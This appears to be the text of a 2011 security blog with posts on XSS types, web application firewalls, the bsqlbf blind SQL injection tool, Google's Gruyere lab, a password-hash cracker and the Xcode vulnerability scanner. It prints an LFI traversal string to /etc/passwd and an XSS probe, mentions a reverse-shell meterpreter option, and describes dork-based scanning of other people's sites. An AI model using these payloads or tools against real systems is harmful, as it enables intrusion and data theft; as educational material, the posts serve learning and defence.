    Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

    Persistent XSS:

    The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

    For Example:   
    Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


    Non-Persistent XSS:

    Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

    Example:
    Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

    In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

    In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

    What can an attacker do with this Vulnerability?
    • Stealing the Identity and Confidential Data(credit card details).
    • Bypassing restriction in websites.
    • Session Hijacking(Stealing session)
    • Malware Attack
    • Website Defacement
    • Denial of Service attacks(Dos)

    Disclaimer:
    This article is intended for educational purpose only.
    Continue   Reading>>

    Wednesday, October 12, 2011

    Introduction to Web Application Firewall (WAF) ~ Website Security


    What is WAF?WAF is expanded as Web Application Firewall. WAF is server side application that controls the input and output(filter the HTTP communication).  It controls network traffic on any OSI Layer up to Application Layer.  The main purpose of WAF is to provide better protection over the top Wep Application vulnerability such as XSS(Cross Site Scripting), SQL Injection,RFI.  Daily lot of websites hacked because of these vulnerability.  Read Our Security News Section to know about the Security Risks in Interent.  Standard firewall blocks Non-HTTP attacks(restriction of ports,access..).  This WAF blocks HTTP attack.

    The Most common Web Application Vulnerabilities:

    • SQL Injection(SQLi)
    • Cross-Site Scripting (XSS)
    • Broken Authentication and Session Management
    • Insecure Direct Object References
    • Cross-Site Request Forgery (CSRF)
    • Security Misconfiguration
    • Insecure Cryptographic Storage
    • Failure to Restrict URL Access
    • Insufficient Transport Layer Protection
    • Unvalidated Redirects and Forwards


    The Wep Application Firewall(WAF) must meat the following features:
    • Protection Against Top Vulnerability(XSS,SQLi,..etc)
    • Very Few False Positives (i.e., should NEVER disallow an authorized request)
    • Strength of Default (Out of the Box) Defenses
    • Power and Ease of Learn Mode
    • Types of Vulnerabilities it can prevent.
    • Detects disclosure and unauthorized content in outbound reply messages, such as credit-card and Social Security numbers.
    • Both Positive and Negative Security model support.
    • Simplified and Intuitive User Interface.
    • Cluster mode support.
    • High Performance (milliseconds latency).
    • Complete Alerting, Forensics, Reporting capabilities.
    • Web Services\XML support.
    • Brute Force protection.
    • Ability to Active (block and log), Passive (log only) and bypass the web trafic.
    • Ability to keep individual users constrained to exactly what they have seen in the current session
    • Ability to be configured to prevent ANY specific problem (i.e., Emergency Patches)
    • Form Factor: Software vs. Hardware (Hardware generally preferred)
    Top 10 Open Source Web Application Firefwall(WAF):

    1. ModSecurity (Trustwave SpiderLabs)
    2. AQTRONIX WebKnight
    3. ESAPI WAF
    4. WebCastellum
    5. BinarySec
    6. Guardian@JUMPERZ.NET
    7. OpenWAF
    8. Ironbee
    9. Profense
    10. Smoothwall
    Continue   Reading>>

    Tuesday, October 11, 2011

    Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer


    What is Blind SQL Injection:
    Some Websites are vulnerable to SQL Injection but the results of injection are not visible to the attacker.  In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

    There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).

    This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections
    Supported Database:
    • MS-SQL
    • MySQL
    • PostgreSQL
    • Oracle

    The tool supports 8 attack modes(-type switch):-
    Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

    Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

    Type 2: Blind SQL Injection in "order by" and "group by".

    Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

    Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

    Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

    Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

    Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

    -cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

    Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

    -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

    For Type 4(O.S code execution) the following methods are supported:

    -stype: How you want to execute command:

    SType 0 (default) is based on java..will NOT work against XE.

    SType 1 is against oracle 9 with plsql_native_make_utility.

    SType 2 is against oracle 10 with dbms_scheduler.


    Disclaimer:
    This Article is for Education purpose only.  The above mentioned software is developed for Penetration testers to test their own Web application Vulnerability. 
    Continue   Reading>>

    Sunday, October 9, 2011

    Learn Web Application Exploits and Defenses for free~Penetration Testing


    Are you willing to Learn Web Application Exploitation and Defense against that? Here is the chance for you.   Google Labs provides a Lab to learn Web Application for free of cost.


    Penetration Testing :
    • Learn how hackers find security vulnerabilities!
    • Learn how hackers exploit web applications!
    • Learn how to stop them! 
    This code lab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following:
    • How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).
    • How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.
    To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

    Gruyere 
    This codelab is built around Gruyere /ɡruːˈjɛər/ - a small, cheesy web application that allows its users to publish snippets of text and store assorted files. "Unfortunately," Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. The goal of this codelab is to guide you through discovering some of these bugs and learning ways to fix them both in Gruyere and in general.

    The codelab is organized by types of vulnerabilities. In each section, you'll find a brief description of a vulnerability and a task to find an instance of that vulnerability in Gruyere. Your job is to play the role of a malicious hacker and find and exploit the security bugs. In this codelab, you'll use both black-box hacking and white-box hacking. In black box hacking, you try to find security bugs by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess server behavior. You do not have access to the source code, although understanding how to view source and being able to view http headers (as you can in Chrome or LiveHTTPHeaders for Firefox) is valuable. Using a web proxy like Burp or WebScarab may be helpful in creating or modifying requests. In white-box hacking, you have access to the source code and can use automated or manual analysis to identify bugs. You can treat Gruyere as if it's open source: you can read through the source code to try to find bugs. Gruyere is written in Python, so some familiarity with Python can be helpful. However, the security vulnerabilities covered are not Python-specific and you can do most of the lab without even looking at the code. You can run a local instance of Gruyere to assist in your hacking: for example, you can create an administrator account on your local instance to learn how administrative features work and then apply that knowledge to the instance you want to hack. Security researchers use both hacking techniques, often in combination, in real life.

    They'll tag each challenge to indicate which techniques are required to solve them: 

    Challenges that can be solved just by using black box techniques.

    Challenges that require that you look at the Gruyere source code.

    Challenges that require some specific knowledge of Gruyere that will be given in the first hint.

    WARNING: 
    Accessing or attacking a computer system without authorization is illegal in many jurisdictions. While doing this codelab, you are specifically granted authorization to attack the Gruyere application as directed. You may not attack Gruyere in ways other than described in this codelab, nor may you attack App Engine directly or any other Google service. You should use what you learn from the codelab to make your own applications more secure. You should not use it to attack any applications other than your own, and only do that with permission from the appropriate authorities (e.g., your company's security team). 

    Continue   Reading>>

    Thursday, October 6, 2011

    Hash Code Cracker v1.2 Video Tutorials


    Running Application:

    In Linux:
    Terminal: The same procedure is followed for Linux version.  Just open the Terminal instead command Prompt.


    Using Application for Cracking password:
    How to Crack the Password using Online Cracker Hash Code Cracker v1.2?


    Continue   Reading>>

    How to Crack the Password using Online Cracker Hash Code Cracker v1.2?


    Continue   Reading>>

    How to Run Hash Code Cracker Jar using Command Prompt~Password Cracking


    Continue   Reading>>

    How to start Hash Code Cracker Jar with double Click~Password Cracking


    Continue   Reading>>

    Tuesday, August 30, 2011

    Xcode SQL Injection / LFI / XSS & Webshell Vulnerability Scanner



    XCODE Exploit: Vulnerable and Webshell Scanner.Once downloaded, extract all the files and run XCodeXploitScanner.exe, Dork Click It and a tool will collect links from Dork you enter and displays the list is. after displaying List, you will be able to conduct SQL injection vulnerability scanning / Local File Inclusion / Cross Site Scripting on the web that is in the list.

    This tool will send the injection parameters to the web as' - * /../../../../../../../../../../../../. . / .. / etc / passwd% 00 "> alert (" XXS Xcode Exploit Scanner Detected ").

    If the Web has a bug then the status will appear:

    SQLi Vulnerablitiy: www.target.com?blabla.php?=1234:
    LFI Vulnerablity: www.target.com?blabla.php?=1234/../../../../../../../../../../../../. . / .. / etc / passwd% 00
    XSS Vulnerablity: www.target.com?blabla.php?=1234 "> alert (" XXS Xcode Exploit Scanner Detected ")


    At the status list is detected, you can click Open Vuln links with a web browser to display on your browser

    This tool also adds webshell hunter, where you can search the web shell C99, R57, C100, ITsecteam_shell, b374k, which had been uploaded by the hackers.



    source
    Continue   Reading>>
    Older Post Home
     

    © Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com